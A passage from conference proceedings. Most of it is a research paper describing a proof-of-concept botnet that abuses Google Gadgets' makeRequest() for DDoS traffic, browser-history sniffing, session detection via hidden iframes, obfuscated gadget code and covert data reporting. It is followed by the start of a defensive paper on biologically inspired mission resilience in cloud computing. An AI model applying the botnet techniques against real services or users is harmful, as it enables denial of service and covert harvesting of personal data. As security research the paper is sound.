two main attack factors Abuse and nefarious use of cloud computing as well as Insecure interfaces<br />
and APIs.<br />
3.1 Establishing denial of service attack capability<br />
Figure 2: Google Gadget makeRequest() function<br />
The Google Gadget API provides users the capability to load remote content into gadgets by calling,<br />
makeRequest() (Google Gadgets API, 2009). This function is asynchronous and can be called<br />
independent from other JavaScript calls. This is a fairly useful capability as this allows users to easily<br />
create gadget versions of their websites and extend their market reach. This function instructs one of<br />
the servers residing on the Google Gadget Domain to perform an HTTP request on behalf of the<br />
gadget user, as illustrated in Figure 3: makeRequest() HTTP request flow. This implies that the request<br />
source is obfuscated and that only the Google Gadget Server IP address will appear in the remote<br />
server logs. By exploiting this communication structure one can use Google Gadget Servers as Bots<br />
for a Botnet. For the purpose of this Proof of Concept we used Goolge’s makeRequest() function to<br />
send and interpret all command and control messages sent between bots and botherder.<br />
Figure 3: makeRequest() HTTP request flow<br />
According to Google Webmaster Central (2010), Google uses a Feedfetcher user-agent to retrieve<br />
remote content. Google’s Feedfetcher user-agent does not follow the Robots Exclusion Protocol. This<br />
protocol is not mandatory but is meant to protect certain pages from being viewed by web spiders and<br />
crawlers. When asked why Google’s Feedfetch agent does not obey robots.txt, the Google<br />
representative states that the Feedfetcher request is the result of an explicit action by a human user,<br />
and not from automatic crawlers, hence Feedfetcher does not follow robots.txt guidelines. This<br />
response would imply it is not possible to generate fetch requests automatically, yet seeing as Google<br />
gadgets are coded in JavaScript it is a trivial task to automate the fetch requests.<br />
35
Ivan Burke and Renier van Heerden<br />
According to (Google Gadgets API, 2009), Google’s makeRequest() function does not validate the<br />
existence of a page prior to sending the HTTP request to remote server. This would mean malicious<br />
coders can use Google Gadgets to probe websites for config, admin or script files stored in un-listable<br />
directories of web pages. This could also be used to create a large amount of traffic towards the web<br />
server by generating makeRequest() calls for none-existent pages on the server. This type of probing<br />
and traffic generation could also be created by pure JavaScript without the use of Google Gadget’s<br />
makeRequest() function, but the benefit of using Google Gadget API is that the remote server logs will<br />
only contain the IP address of Google Gadget application servers, as illustrated by Figure 4: Remote<br />
server log.<br />
Figure 4: Remote server log<br />
Google provides a cache features for all its gadgets to reduce server loads (Google Gadgets API,<br />
2009). This cache server saves a copy of the remote content on a local server for faster retrieval. By<br />
default Google gadgets get cached for approximately one hour. Due to the requirement of some<br />
gadget developers to have shortened cache timing due to dynamic nature of their gadgets, Google<br />
provided developers with the capability to set the cache interval. According to Google Gadgets API<br />
(2009), it is possible to set the interval to zero seconds. Google Gadget API does not prevent<br />
developers from setting cache interval to zero but warns against setting cache interval to zero as it<br />
might overload remote server.<br />
Thus we have discovered two means of disrupting remote server. Either by generating near infinite<br />
fictitious web pages from a server, or by fetching the same page recursively and setting the refresh<br />
interval to zero seconds.<br />
3.2 Retrieving user data<br />
Clients using the Cloud uses API calls to communicated and execute commands on the Cloud,<br />
through its Service-Orientated Architecture (SOA). In general, cloud computing units are heavily<br />
compartmentalized to insure no data can be leaked between clients. Unfortunately the components<br />
that makeup the Cloud infrastructure, such as CPU, Ram and GPU, where not specifically designed<br />
for isolation. (Hubbard et al., 2010) Techniques to exploit this weakness have been demonstrated by<br />
Joanna Rutkowska (Rutkowska, 2008) and Kostya Kortchinsky (Kortchinsky, 2009). In our specific<br />
case we do not target data on the Cloud specifically we merely use the Cloud as a channel to pass<br />
and receive message.<br />
Google gadget API is a collection of JavaScript libraries; as such they require JavaScript to be<br />
enabled to utilize its capability. JavaScript can be used to determine user browser history and browser<br />
information. Cabri (2007), created a simplistic JavaScript to determine if a page have been visited<br />
before. Figure 5: Sites visited script, contains the script he used. By using this script to look up<br />
banking sites or social media sites one can determine which banking and social media services the<br />
user have visited.<br />
By combining this script with Google gadget makeRequest(), one can determine if the user has auto<br />
login enabled for certain social media sites. For example: to test if the user has auto-logon enabled on<br />
Facebook one can request http://www.facebook.com/home.php. If the content is the home page it<br />
would mean the browser automatically logged the user in or the user has an active Facebook session.<br />
If the login page is returned it would mean the user’s session has expired or that auto-logon is<br />
disabled. Keep in mind that makeRequest() does not display the page, it merely returns its contents to<br />
the callback function specified by the makeRequest() call. This means that the user does not need to<br />
get any visual cues of gadget activity. The Botnet designer can choose whether to scrape the<br />
resulting homepage for more data or to crawl the social network site for more data or to just report the<br />
information back to Botherder for future use.<br />
36
Ivan Burke and Renier van Heerden<br />
Figure 5: Sites visited script<br />
Hashemian (2005), created a PHP script that can be accessed via JavaScript to perform IP resolution<br />
and reverse DNS lookups for visitors to sites. This provides more info on the location and domain<br />
usage of gadget user. Google’s makeRequest() function is also capable of performing a POST<br />
request. By combining these JavaScript information gathering techniques and posting capability of<br />
Google’s makeRequest() one can report back gathered information to Botherder. This is just some of<br />
the data that can be gathered using JavaScript and by no means covers all the data that can be<br />
harvested by JavaScript but for the purposes of this Proof of Concept they are sufficient.<br />
3.3 Adsense abuse<br />
Advertising companies offering website designers money for serving up adverts on their sites. By<br />
requesting pages using makeRequest() one can fool most Impression Based advertising models into<br />
counting the page fetch as an impression hence generating revenue for the website designer. Unique<br />
IP addresses have a higher weight on Advanced Impression Based advertising sites. Because<br />
Google Gadget Application servers make the request, only a select few IP addresses will in effect be<br />
displayed in advertising company logs. Hence, Adsense abuse is not really effective with Google<br />
Gadget API but it does guarantees a steady and constant number of visits to a site.<br />
3.4 Obfuscating source of attack<br />
Thus far it has already been stated that if the Google Feedfetcher is used to fetch remote data only<br />
the Google Gadget Domain Server's IP will be logged in the remote servers access logs. This is<br />
already an attempt to obfuscate the source of the attack. Unfortunately for Google gadgets to work<br />
and to be published Google needs to be able to access the gadget source code. This means that<br />
anyone wishing to add the gadget would also be able to fetch the source code and could possibly<br />
deduce that it executes malicious commands. A simple way of overcoming this obstacle is obfuscate<br />
the source code. By encoding the JavaScript source code in base64. Wang, (2009) developed a web<br />
tool specifically designed to obfuscate JavaScript. Figure 6 illustrates the result of obfuscating the<br />
hasLinkBeenVisited() function.<br />
37
Figure 6: JavaScript obfuscation<br />
3.5 Spreading of botnet<br />
Ivan Burke and Renier van Heerden<br />
Thus far we have illustrated two layers of attack. The DDoS attacks and Adsense abuse described in<br />
previous subsections are targeted towards remote servers or Impression Based advertising<br />
companies, these attacks are in effect performed by the gadget users on behalf of the botherder. The<br />
second layer of attack is the data gathering performed on the actual gadget user.<br />
Attacks on remote server, actually require few gadget users. A botherder can automate mass<br />
amounts of requests from a single gadget user. FeedFetcher was designed distributed on several<br />
machines to improve performance and to cut down on bandwidth Google attempts to make the fetch<br />
request on a machine situated near target remote site. This would mean that the IP would constantly<br />
change and that the physical location of fetching machines can also be varied.<br />
The second layer of attack is more reliant on the gadget itself to spread among users. For the<br />
purpose of this research we merely created several Google accounts and used Google Gadget<br />
sharing capabilities to distribute the gadgets. We will now briefly discuss some of the options available<br />
for spreading of gadgets.<br />
Google Gadget API provides users with the capability of sharing gadgets among a user’s Google<br />
contact list or by sending out emails containing an invite to install the gadget. Google also provide the<br />
capability of publishing the gadget on their Application servers. Published applications can be ranked<br />
and browsed by all iGoogle users. By manipulating the Google ranking system one can increase the<br />
probability of your gadget being added by other users.<br />
Google Gadget API is fully integrated with OpenSocial API. OpenSocial API is a web framework for<br />
developing social applications which are capable of communicating across multiple social media sites.<br />
Peterson (2009), provides some basic steps than can be taken to increase gadget spread.<br />
In the next Section, we will discuss our final Botnet model. We discuss how we mapped all the<br />
techniques described in this Section into our final Proof of Concept model.<br />
4. Botnet gadget<br />
Figure 7: Botnet Gadget illustrates the basic structure of our Botnet gadget. The Botherder acts as a<br />
Gadget developer and uses Google’s services to update the Gadget and by extension update the<br />
Botnet. By doing this the Botherder can have a single point of access to all Bots at the same time.<br />
Updates might include new JavaScript attacks or even new targets for DDoS attack. The Botnet hides<br />
in plain sight as a normal gadget. It could either use a command from the Botherder or a temporal<br />
event to trigger a remote attack and while the Botnet is waiting to commence the next attack the<br />
Gadgets can gather information on Gadgets users and possibly identify other means of<br />
communications or vulnerabilities on Gadget user’s PC.<br />
38
Ivan Burke and Renier van Heerden<br />
Figure 7: Botnet Gadget<br />
In the remainder of this Section we discuss the attacks we added to our PoC Botnet Gadget and we<br />
discuss some of the information obtained by our Botnet Gadget.<br />
We used the JavaScript function provided by Cabri (2007) to extract user history information such<br />
which Social network site the gadget user has visited and which bank he or she uses. Cabri’s (2007)<br />
script can only determine if a site has been visited hence it is an exaustive search, hence we scanned<br />
though a targeted list of URLs for information we were interested in. We used JSON IP Adress<br />
recovery script provided by (Bullock, 2010), to determin gadget user IP Time zone and general<br />
geographical location using the retrieved IP.<br />
Figure 8: Sample of JSON IP recovery script<br />
To determine if the gadget user has auto login for social network sites we create hidden iFrames to try<br />
and access logged in content of social media sites. We queried the iFrame content to determine<br />
whether the iFrame was redirected to Login page or whether it could access the content. This data<br />
along with IP and history data was posted back to our own remote server using Google’s<br />
makeRequest() function.<br />
For a denial of service attack we used one of our own servers and requested fictitious pages from it<br />
using makeRequest() function. We placed fetch request in a n endless loop that generated<br />
39
Ivan Burke and Renier van Heerden<br />
randomized page requests to our server. This approach was not successful as it lead to gadget user<br />
PC to run out of memory. Upon investigation we realized this was caused by Google’s AdSense<br />
triggering upon each remote request. We realized that by slowing the request time one could<br />
effectively use this technique for AdSense abuse but as this was not our goal with this PoC we<br />
deactivated AdSense tracking.<br />
We ran the DDoS attack ten times on our own server. We used a single Google Gadget machine.<br />
Table 1: DDoS results shows that on average 638 requests were executed per second. According to<br />
server logs, eight unique Google domain servers were used to make the remote requests. Based on<br />
this data and data pertaining to a specific target server one can determine the number of Gadget<br />
users required to effectively take down a remote server. Unfortunately there is no fixed number of<br />
Gadget users that is required to disrupt a service. The number required is dependent on server<br />
architecture, request routing and data transferred per request. This PoC just determined the rough<br />
number of request that are possible using Google gadgets.<br />
Table 1: DDoS results<br />
Experiment Time per 1000 requests Requests per second<br />
1 1.376 726.744<br />
2 1.884 530.786<br />
3 1.232 811.688<br />
4 1.473 678.887<br />
5 1.661 602.047<br />
6 1.573 635.768<br />
7 1.589 629.406<br />
8 1.605 623.169<br />
9 1.621 617.055<br />
10 1.637 611.060<br />
Average 1.56495 638.998<br />
5. Future work<br />
This paper, merely wishes to illustrate the ease of generating a potential Botnet using services<br />
provided by Google Gadgets. In actuality the only true exploit was the fact that Google allows users to<br />
use Google servers to fetch remote content. The fact that Google gadgets require JavaScript in order<br />
to run, just facilitate the process of automating the attack.<br />
The whole spectrum of attacks on JavaScript can be used with Google’s services. The ability to<br />
execute code from Google’s computers can lead to other misdirection attacks. Google is not the only<br />
commercial player in the internet cloud space. Similar attacks may be possible from Microsoft, Yahoo<br />
or Amazon services. We aim to investigate this in future research.<br />
In this paper we did not investigate the possibility of AdSense revenue generation. By registering a<br />
impression based advertising mechanism, such as Adgator, one can generate revenue simply by<br />
delaying repetitive fetch requests a Botherder. More complex techniques are proposed by Hansen<br />
(2008) to add Clickthrough or Pay-Per-Click advertising schemes.<br />
The Botnet Gadget suffers from several critical weaknesses. Because the Botnet Gadget relies on<br />
Google Feedfetch agent to make remote requests it can easily be stopped by blocking all requests<br />
from this agent. But this will influence other legitimate FeedFetch agent request from Google reader.<br />
Another potential weakness is that Google gadget source code needs to accessible by Google<br />
Gadget Servers hence if a malicious gadget is detected Google could easily remove the Gadget and<br />
the Botherder would lose all its Bots.<br />
6. Conclusion<br />
In this paper we reiterated the views of Stracener (2008) and Hubbard et al. (2010) that as the<br />
computer user base moves towards cloud computing so to will the security threats. We used<br />
Hubbard’s seven key threat indicators to try and identify possible routes of attack for our research.<br />
40
Ivan Burke and Renier van Heerden<br />
First, we defined the four key components of a Botnet. We then provided examples of how these<br />
components can be mimicked by Cloud services and specifically by Google’s gadget API and how<br />
they match the Cloud security threats identified by Hubbard. The API was capable of reproducing<br />
each of the components functionality, to a limited degree with very little alteration of freely available<br />
web resources.<br />
We combined these components to form a simple but working botnet. Although limited in scope, a<br />
simple DDoS attack was achieved by using Google servers as the attacking computers. The current<br />
botnets concentrate on using personal and corporate computers, but as they are moving into the<br />
cloud computing, the botnets will follow.<br />
We identified several weak points in our current design and identified some possible areas for future<br />
development of Cloud botnet research. This is still a rather new field and as such this paper hopes to<br />
serve as a possible point of reference for future work.<br />
References<br />
Banks, S. & Strytz, M., 2007. Bot armies: an introduction. [Online] SPIE Available at:<br />
http://spie.org/x15000.xml?ArticleID=x15000 [Accessed 10 October 2010].<br />
Bullock, D., 2010. IP Address Geolocation JSON API. [Online] Available at:<br />
http://ipinfodb.com/ip_location_api_json.php [Accessed 8 October 2010].<br />
Cabri, R., 2007. Spyjax - Your browser history is not private! [Online] Available at:<br />
http://www.techtalkz.com/news/Security/Spyjax-Your-browser-history-is-not-private.html [Accessed 7<br />
October 2010].<br />
Denis, B., 2008. Anatomy of the Asprox Botnet. [Online] VeriSign Available at:<br />
http://xylibox.free.fr/AnatomyOfTheASPROXBotnet.pdf [Accessed 30 September 2010].<br />
Engate, 2009. Defending your network from Botnet threat. [Online] Engate Available at:<br />
http://ns1.happynet.com/images/datasheets/Engate_whitepaper.pdf [Accessed 9 October 2010].<br />
Eston, T., 2010. DigiNinja. [Online] Available at: http://www.digininja.org/ [Accessed 5 October 2010].<br />
Felix, F.C., Thorsten, H. & Wicherski, G., 2005. Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />
Distributed Denial-of-Service Attacks. Computer Security – ESORICS 2005, 3679, pp.319-15.<br />
Garner, 2008. Gartner Says Cloud Computing Will Be As Influential As E-business. Garner Inc. Stamfort: Garner<br />
Inc.<br />
Google Gadgets API, 2009. Working with Remote Content. [Online] Google Available at:<br />
http://code.google.com/apis/gadgets/docs/remote-content.html [Accessed 7 October 2010].<br />
Google Webmaster Central, 2010. Feedfetcher. [Online] Google Available at: "<br />
http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=178852 [Accessed 3 October<br />
2010].<br />
Hansen, R. & Stracener, T., 2008. Xploiting Google Gadgets: Gmalware and beyond. [Online] Available at:<br />
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-stracener-hansen.pdf [Accessed 3<br />
October 2010].<br />
Hashemian, R.V., 2005. JavaScript Visitor IP Address and Host Name. [Online] Available at: I:\JavaScript Visitor<br />
IP Address and Host Name.mht [Accessed 3 October 2010].<br />
Hubbard, D. et al., 2010. Top Threats to Cloud Computing V1.0. Cloud Security Alliance.<br />
Kiefer, K.P., 2004. Background on Operation Web Snare. [Online] Available at:<br />
http://www.justice.gov/criminal/fraud/documents/reports/2004/websnare.pdf [Accessed 3 December 2010].<br />
Kortchinsky, K., 2009. Black Hat. [Online] Immunity, Inc. Available at: http://www.blackhat.com/presentations/bhusa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf<br />
[Accessed 16 November 2010].<br />
MacManus, R., 2008. Read Write Web. [Online] Available at:<br />
http://www.readwriteweb.com/archives/survey_48_of_bank_customers_wa.php [Accessed 6 October 2010].<br />
Ollmann, G., 2009. A Botnet by Any Other Name. [Online] Available at:<br />
http://www.securityfocus.com/columnists/501 [Accessed 11 October 2010].<br />
Peterson, V., 2009. Social Design Best Practices. [Online] Available at:<br />
http://wiki.opensocial.org/index.php?title=Social_Design_Best_Practices [Accessed 3 October 2010].<br />
Rutkowska, J., 2008. Black Hat. [Online] Coseinc Available at: http://www.blackhat.com/presentations/bh-usa-<br />
06/BH-US-06-Rutkowska.pdf [Accessed 16 November 2010].<br />
Stracene, T., 2008. Securing Widgets and Gadgets in the Web 2.0 World. [Online] Available at:<br />
http://blog.cenzic.com/public/blog/208285 [Accessed 6 October 2010].<br />
Vamosi, R., 2008. CNET News. [Online] Available at: http://news.cnet.com/8301-10789_3-10040669-57.html<br />
[Accessed 2 October 2010].<br />
Wang, A., 2009. Javascript Obfuscator . [Online] Available at: http://www.javascriptobfuscator.com/Default.aspx<br />
[Accessed 12 October 2010].<br />
41
Mission Resilience in Cloud Computing: A Biologically<br />
Inspired Approach<br />
Marco Carvalho 1 , Dipankar Dasgupta 2 , Michael Grimaila 3 and Carlos Perez 1<br />
1<br />
Florida Institute for Human and Machine Cognition, Pensacola, USA<br />
2<br />
University of Memphis, USA<br />
3<br />
Air Force Institute of Technology, Wright-Patterson AFB, USA<br />
mcarvalho@ihmc.us<br />
ddasgupt@memphis.edu<br />
michael.grimaila@afit.edu<br />
cperez@ihmc.us<br />
Abstract: With the continuously improving capabilities enabling distributed computing, redundancy and diversity<br />
of services, Cloud environments are becoming increasingly more attractive for missioncritical and military<br />
operations. In such environments, mission assurance and survivability are key enabling factors for deployment,<br />
and must be provided as an intrinsic capability of the environment. Mission-critical frameworks must be safe and<br />
resistant to localized service failures and compromises. Furthermore, they must be able to autonomously learn<br />
and adapt to the environmental challenges and mission requirements. In this paper, we present a biologically<br />
inspired approach to mission survivability in cloud computing environments. Our approach introduces a multilayer<br />
infrastructure that implements threat detection and service failure coupled with distributed assessments of<br />
mission risks, automated re-organization, and re-planning capabilities. Our approach leverages some insights<br />
from developmental biology at the service orchestration level, and takes failures and risk estimations as<br />
weighting functions for resource allocation. The paper first introduces and formulates the proposed concept for a<br />
simple single mission environment. We then propose a simulated scenario for proof-of concept demonstration<br />
and preliminary evaluation, and conclude paper with a brief discussion of<br />
results and future work.<br />
Keywords: mission assurance, cloud computing, mission survivability, biologically-inspired<br />
resilience<br />
1. Introduction<br />
Mission survivability is recognized as the capacity to maintain the execution, and ensure successful<br />
completion of mission-critical systems, even under localized failures and attacks. In<br />
resourceconstrained environments, mission survivability includes the prioritization of services and<br />
capabilities to maintain mission goals. Previous research efforts on Mission Assurance have focused<br />
on the estimation of effects caused by localized failures (or attacks) to the mission and the design of<br />
robust plans for impact minimization. These are challenging and important capabilities that rely on a<br />
mapping of mission tasks to associated components and their corresponding interdependencies.<br />
They generally provide mechanism for the online evaluation of mission impact, for human<br />
intervention. There is a need to combine these capabilities with self-managing and resilient mission<br />
critical frameworks. In the context of this work, a resilient mission-critical infrastructure is defined as a<br />
computational and communications infrastructure capable to maintain a successful mission execution<br />
(mission survivability) and to remain mission capable under localized disruptions, which normally<br />
requires the capacity to detect, identify, and recover from previous attacks.<br />
More generally, an idealized resilient infrastructure must be able to seamlessly absorb local failures or<br />
attacks with no immediate impact to the mission, while also isolating and recovering from the problem<br />
in order to maintain its capacity to effectively execute subsequent missions. They are expected to be<br />
robust and adaptive infrastructures, capable to learn from experience, and improve their own<br />
performance and survivability.<br />
The challenge is that most mission-critical systems have been traditionally designed for cost efficiency<br />
and performance, with little room from component redundancy and diversity (Cohen,<br />
2005).Furthermore, they generally rely on fixed architectures and configurations, favoring<br />
predictability and control, often in lieu of self-management and run-time adaptability. However, in the<br />
recent years, the computational landscape for mission critical systems has changed significantly with<br />
the increasing acceptance of service oriented architectures as a new design paradigm for systems<br />
design, and the introduction of cloud computational environments to provide large scale, low-cost and<br />
agile commodity computing and storage capabilities. The prospect of highly redundant and adaptive<br />
42
Marco Carvalho et al.<br />
systems starts to become reality, as new adopters begin to leverage the capabilities of these<br />
combined technologies for high-end systems development.<br />
Following several industry initiatives, the United States (US) Government begins to consider the new<br />
landscape. For example the Central Intelligence Agency (CIA) has recently reported it is investing in<br />
cloud analytics, cloud widgets and services, cloud security-as-a-service, cloud enterprise data<br />
management and cloud infrastructure, using commercial IT technologies to analyze multi-lingual data,<br />
audio, Twitter tweets, video and text messages that add layers of complexity to intelligence gathering<br />
(Yasin, 2010).<br />
When properly managed and coordinated, the new environment provides the means and tools for<br />
large-scale distributed systems development, including on-demand resource allocation, dynamic<br />
resource management, diversity in services and capabilities, intrinsic replication for data recovery and<br />
several other capabilities. The challenge, however, is to coordinate all these powerful features in<br />
order to enable resilient mission-critical systems.<br />
In this paper we introduce an organic approach to mission resilience in large-scale and adaptive<br />
computational environments. In particular, we focus on the issues of mission continuity and<br />
survivability in response to attacks, as well as runtime system management and adaptation. In section<br />
2 we briefly discuss the proposed challenges and requirements of mission critical systems for SOA<br />
and cloud environments, as well as some background discussions on service discovery and<br />
orchestration. In section 3 we introduce our biologically-inspired approach on organic resilience for<br />
mission-critical systems, followed by some preliminary discussions on the proposed ideas, and<br />
conclusions.<br />
2. Mission critical systems in the cloud<br />
As previously defined, the goal of resilient mission critical systems is to ensure the successful<br />
execution and completion of the mission while remaining mission-capable in response to localized<br />
failures and attacks. In the context of this work we are primarily concerned with the availability and<br />
integrity aspects of the problem. While data exfiltration and privacy are important and challenging<br />
issues in the cloud environments, they are not considered in the scope of this work. We are primarily<br />
concerned with attacks or failures that may directly disrupt the mission. While there are multiple ways<br />
to describe and represent a mission we will consider that a mission can be represented as a set of<br />
workflows, or a set of strictly ordered sequences of tasks, as illustrated in Figure 1.<br />
In this example, a mission is composed as a set of workflows. Each workflow is composed by a set of<br />
ordered tasks and may represent, for instance, a set of image processing steps to be performed on<br />
imagery collected by surveillance aerial vehicles. Each processing step, represented by the task (A,<br />
F, G, and A) must be performed in strict order, and services 1, 4 and 7 have been tasked to jointly<br />
execute the workflow. It is important to note that service selection in this example may refer to the<br />
orchestration of services provided by a supporting Service Oriented Architecture (SOA) in the cloud.<br />
Figure 1: Distributed execution of a mission represented as a set of workflows<br />
43
Marco Carvalho et al.<br />
In Figure 1, mission success requires a minimum rate of images being successfully processed by the<br />
system. Failures or delays of any of the services engaged in the allocation will likely disrupt the<br />
execution of a workflow (i.e. the processing of one image, in this example) and eventually<br />
compromise the mission.<br />
One of the main benefits provided by a cloud-computing environment (and supporting serviceoriented<br />
capabilities) is the availability of resources that can be quickly engaged for service execution and<br />
released when no longer needed. They also enable the availability of multiple configurations and<br />
implementations for the same type of service (diversity) potentially provided by supporting Service<br />
Oriented Architectures or Software-as-a-Service (SaaS) architectures is also critically important for<br />
resilient mission execution. Combined, these capabilities can be leveraged to:<br />
Enable a dynamic, elastic and automated computing framework for mission execution. This<br />
capability enables mission-critical systems to dynamically balance resource allocation based on<br />
operational context and mission requirements, without building massive amounts of idle<br />
overcapacity.<br />
They enable the parallel execution of critical tasks on demand, over heterogeneous software (and<br />
emulated hardware) systems.<br />
The process of identifying and organizing the services for the task execution (services 1, 4 and 7) is<br />
our example requires a discovery mechanism and an orchestration process, which may be centralized<br />
or distributed. In most cases, the discovery and orchestration of services are based on protocols<br />
defined for Service Oriented Architectures operating over cloud computing environments. They often<br />
take place before mission execution, and remains fixed until a failure is detected or the mission is<br />
completed. In the following items, we will provide a brief review of conventional discovery and<br />
orchestration protocols often used in SOAs.<br />
2.1 Service discovery in cloud environments<br />
There are two aspects involved in service discovery on cloud-enabled frameworks: the identification<br />
of services capable to accomplish a given task, and the identification of computational resources for<br />
executing the service. The first problem is often addressed by conventional service discovery<br />
algorithms for service oriented architectures or software-as-a-service (SaaS) running on cloud<br />
environments. The second part of the problem is generally provided as part of the cloud infrastructure<br />
itself.<br />
The discovery of cloud resources enables load dynamic load balancing and scalability by dynamically<br />
moving services and processes running in the cloud. Most cloud resource allocation services offer<br />
either a centralized or hierarchical approach to this problem, but some authors have also propose<br />
P2P strategies based on Distributed Hash Tables for resource management (Ranjan, 2010). As for<br />
service discovery, service developers often rely on different types of SOA service discovery,<br />
recognizing that some SOA-based services rely on capabilities (e.g. multicast-based discovery) not<br />
necessarily supported by some environments.<br />
One of the earliest service discovery mechanisms available in web service environments was the<br />
Universal Description, Discovery and Integration (UDDI) (Oasis, 2002). UDDI provided a<br />
registrybased approach to service discovery. The approach didn’t gain strong adoption from Industry<br />
as IBM, Microsoft, and SAP closed their public UDDI registries, and Microsoft moved UDDI services<br />
from Windows Server to their services orchestration product called Biztalk. It is possible that UDDI<br />
might still be used inside organizations to dynamically find services within smaller domains, but the<br />
workgroup defining the standard completed their work in 2007. WS-Discovery (Oasis, 2009) provides<br />
an alternative way to service discovery. WS-Discovery is a multicast discovery protocol reducing the<br />
need for a centralized registry. The communication is mainly done using SOAP over UDP. WS-<br />
Discovery has found a niche amongst the network device builders. But its adoption in cloud<br />
environments is limited due to constraints in multicast traffic often imposed in cloud environments.<br />
Another discovery method that has been gaining attention is the DNS-based discovery. Zeroconf, the<br />
protocol implemented by Apple's Bonjour for service discovery, uses DNS and multicast DNS for<br />
service discovery.<br />
One of the next challenges in service discovery is to enable semantic queries (Papazoglou, 2008),<br />
which involves adding semantic annotations and descriptions of QoS characteristics (Klusch, 2006;<br />
44
Marco Carvalho et al.<br />
Benatallah, 2003; Lord, 2005). In 2007, the W3C published a recommendation for Semantic<br />
Annotations for WSDL (W3C, 2007) with limited adoption so far.<br />
2.2 Service orchestration in cloud environments<br />
Service Orchestration generally refers to the composition of modular services to execute a task. The<br />
selection of a service is generally based on interface and capability descriptions. A lot of effort in<br />
service orchestration is focused on tools and languages for service and interface descriptions such as<br />
the Business Process Execution Language (BPEL) and its web-services variation (WS-BPEL). In<br />
most cases, service orchestration is provided by centralized services such as Microsoft’s BizTalk<br />
(Microsoft, 2010) amongst others. There are, however, some research efforts to enable peer-to-peer<br />
orchestration (Bradley, 2004). While centralized approaches to service orchestration are generally<br />
more effective to create complex service structure, they represent a single point of failure in the<br />
process which is undesirable for mission-critical systems. They also require an external correction to<br />
localized failures, which implies that service wide disruptions must be perceived to trigger a<br />
reconfiguration of the service composition. A decentralized strategy for service orchestration, on the<br />
other hand, enables a more robust and emergent approach to the problem. They are generally unable<br />
to provide the same determinism and time guarantees of centralized approaches but if properly<br />
implemented they are better suited to address localized failures and disruptions.<br />
3. Organic computing for mission resilience<br />
In this paper we propose a multi-layer approach to system resilience that builds upon peer-to-peer<br />
discovery and orchestration strategies for mission management. Our approach builds upon previous<br />
research on resilient tactical infrastructures (Carvalho, 2010). It is biologically inspired in the sense<br />
that we combine insights from developmental biology, diversity and immunology, including<br />
inflammatory and immunization systems. In our formulation these biological traits are desirable<br />
capabilities that can be implemented in multiple ways by leveraging services and features enabled by<br />
cloud computing and our own support services. An illustrative view of the proposed architecture is<br />
shown in Figure 2. The service and resource management capabilities illustrated in the lower part of<br />
the figure are provided by the cloud computing and SOA (or SaaS) support services. The organic<br />
defense framework is implemented as the three upper layers in the system.<br />
Figure 2: Proposed multi-layer defense architecture<br />
For the purposes of the organic defense framework, the resource management and service<br />
management capabilities provide the mechanisms necessary for service response and adaptation.<br />
The organic defense infrastructure builds upon three supporting capabilities:<br />
Nodes and services are capable to identify a localized failure or attack. This assumption is based<br />
on the fact that nodes engaged in mission-critical applications are frequently interacting with their<br />
45
Marco Carvalho et al.<br />
neighbors, which allows them to either self-evaluate and identify a failure or a degradation in<br />
performance, or to be notified by its peers of a performance problem.<br />
The defense infrastructure must be able to re-allocate mission critical services to other<br />
(functionally equivalent) services and resources in the system. This capability enables a quick<br />
response to local disruptions and attacks, mitigating their immediate impact to the mission.<br />
The defense layer must be able to replace a service (i.e. shutdown a compromised service and<br />
instantiate a new one) with a copy that is functionally equivalent but with different implementation,<br />
this capability enables the system recover recently lost capabilities, and to diversify its<br />
configuration in order to develop resiliency and eventually immunity against the attack.<br />
Combined, these capabilities enable the multi-layer response infrastructure illustrated in Figure 2. The<br />
first (lower) layer manages the dynamic allocation of resources for mission execution. The second<br />
layer is responsible for the identification, response and potential immunization to localized damages<br />
(i.e. failures or attacks) detected and reported by the first layer. The identification process consists on<br />
correlating the damage with the characteristics and configuration of the effected node. The response<br />
mechanism may include the quarantine, termination or re-initialization of the affected node. The<br />
immunization mechanism provided by the second layer includes the creation of functionally similar<br />
nodes with different software configurations (diversity).<br />
In parallel, the third (and higher) layer coordinates the sharing of information about the attack,<br />
ensuring that a collective response (if appropriate) can be enforced, and that nodes that are<br />
functionally similar to the victim can be reconfigured to prevent a similar attack. A collective response<br />
to an attack may include, for instance, modifications in routing weights to disfavor the use of nodes<br />
that may have been compromised. While simultaneously supported and coordinated, the proposed<br />
defense infrastructure must be loosely couple to prevent a cascade failure in the event that one of the<br />
components becomes temporarily impaired or permanently compromised. As conceived, the<br />
coordinated operation of all three components is necessary to enable a comprehensive response and<br />
system resilience, each component will also operate independently with limited performance gains,<br />
ensuring a graceful degradation of the survivability infrastructure itself.<br />
3.1 Damage detection<br />
One of the assumptions of our approach is that individual services are capable to monitor their own<br />
sensors and performance to detect local damages. In practice, damage detection may be<br />
implemented in multiple ways. In the context of mission continuity, damage is directly related to the<br />
inability of a service to execute its tasks, or a significant degradation in task execution performance<br />
(below acceptable QoS requirements). From that perspective, there is no distictions from damage<br />
caused by localized failures or malicious acts. The effects of both events will be similar, as well as the<br />
way in which the system will respond.<br />
Other approaches for damage detection have also included statistical and biologically inspired<br />
techniques based on Danger Theory (Yuan, 2009), and Artificial Immune Systems (Dasgupta, 2002;<br />
Liang, 2006) amongst others. In most cases damage is based on negative signature matching or<br />
anomaly detections associated with misbehavior s or performance degradations. Upon damage<br />
detection the system will immediately notify the upper layers (for resource management and<br />
response/immunization), while in parallel trying to identify correlated features that could be linked<br />
(maybe causally) to the event. Previous research efforts have been proposed for that, including the<br />
application of Hidden Markov Models (Cho and Park, 2003; Ourston, Matzner, Stump and Hopkins,<br />
2003), decision trees (Li and Ye, 2001; Abbes, Bouhoula, and Rusinowitch, 2004), and others.<br />
3.2 Resource management for mission continuity<br />
Automatic resource and service re-allocation in response to localized failures is common practice in<br />
Grid environments, and has also been previously proposed for enterprise (Lardieri et al, 2007) and<br />
tactical (Carvalho et al, 2005) environments. However, in general, a change in allocation strategy<br />
happens only when degradation (or failure) has taken place and the impact on the mission has been<br />
noted, there's generally no predictive re-allocation based on increased risk of an attack or failure,<br />
learned at runtime from novel attacks.<br />
Our proposed approach leverages and extends such dynamic allocation strategies to enable the<br />
proactive task reallocation, based on online risk estimations. For our current proof-of-concept mission<br />
46
Marco Carvalho et al.<br />
management layer implementation, we have adopted a greedy distributed coordination algorithm<br />
using a generalized cost metric per node for resource management. When a workflow is received,<br />
each node makes a local decision about task execution based on current local cost estimations. If<br />
